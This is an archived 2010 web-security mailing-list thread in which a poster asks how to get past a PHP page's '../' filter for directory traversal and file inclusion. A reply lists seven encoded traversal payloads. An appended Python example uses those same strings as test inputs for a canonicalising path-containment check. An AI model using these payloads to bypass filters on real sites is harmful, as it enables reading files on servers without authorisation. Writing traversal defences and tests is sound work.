[WEB SECURITY] ../ filtered

Shlomi Narkolayev shlominar at gmail.com
Tue Feb 16 01:41:16 EST 2010


Try these:
..%5c..%5cFILENAME
%2e%2e\%2e%2e\FILENAME
..%c0%af..%c0%afFILENAME
..%255c..%255cFILENAME
%252e%252e/FILENAME
..%2f..%2fFILENAME
..%252f..%252fFILENAME


Soon I'll upload 1400 new variants for directory traversal to my blog
<http://narkolayev-shlomi.blogspot.com/>.

Kind Regards,
Narkolayev Shlomi.



From: Beatriz Duran [mailto:beatrizdrn at yahoo.com]
Sent: Monday, February 15, 2010 9:43 AM
To: websecurity at webappsec.org
Subject: [WEB SECURITY] ../ filtered



Hi, I need to find a vulnerability in a URL that could be exploited for
directory traversal and LFI; the page is working with PHP but it is
filtering /../ and also /%2e%2e/, because the page is using ISO for Latin
characters I can't use extended Unicode because it gets reinterpreted with
other values; is there another way to work around the filter?
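
Added example (not part of the original posts): a server-side check that decodes a request value until it is stable, folds backslashes and overlong UTF-8 separators to "/", and then tests containment on the resolved path instead of matching substrings, so every variant listed in the reply resolves to the same answer. The base directory, function names and round limit are assumptions made for the illustration.

```python
import posixpath
from urllib.parse import unquote_to_bytes

# Overlong UTF-8 forms of '/', '\' and '.'; %c0%af in the reply above is the first.
OVERLONG = {b"\xc0\xaf": b"/", b"\xc1\x9c": b"\\", b"\xc0\xae": b"."}
MAX_ROUNDS = 5               # assumption: input still changing after this is rejected
BASE_DIR = "/var/www/files"  # assumption: hypothetical directory the app may serve

# Request values copied from the list in the reply above.
SAMPLES = [
    "..%5c..%5cFILENAME",
    "%2e%2e\\%2e%2e\\FILENAME",
    "..%c0%af..%c0%afFILENAME",
    "..%255c..%255cFILENAME",
    "%252e%252e/FILENAME",
    "..%2f..%2fFILENAME",
    "..%252f..%252fFILENAME",
]

def canonicalize(raw: str) -> str:
    """Percent-decode until nothing changes, then use '/' as the only separator."""
    data = raw.encode("utf-8")
    for _ in range(MAX_ROUNDS):
        decoded = unquote_to_bytes(data)
        for seq, plain in OVERLONG.items():
            decoded = decoded.replace(seq, plain)
        if decoded == data:          # stable: no encoding layer left
            break
        data = decoded
    else:                            # changed on every round: refuse to guess
        raise ValueError("too many encoding layers")
    return data.replace(b"\\", b"/").decode("latin-1")

def is_contained(raw: str, base: str = BASE_DIR) -> bool:
    """True only if the fully decoded path resolves inside base."""
    try:
        rel = canonicalize(raw)
    except ValueError:
        return False
    if "\x00" in rel:                # NUL bytes never belong in a file name
        return False
    full = posixpath.normpath(posixpath.join(base, rel))
    return full == base or full.startswith(base + "/")

if __name__ == "__main__":
    for s in SAMPLES + ["reports/2010/summary.txt"]:
        print(f"{s!r:40} contained={is_contained(s)}")
```
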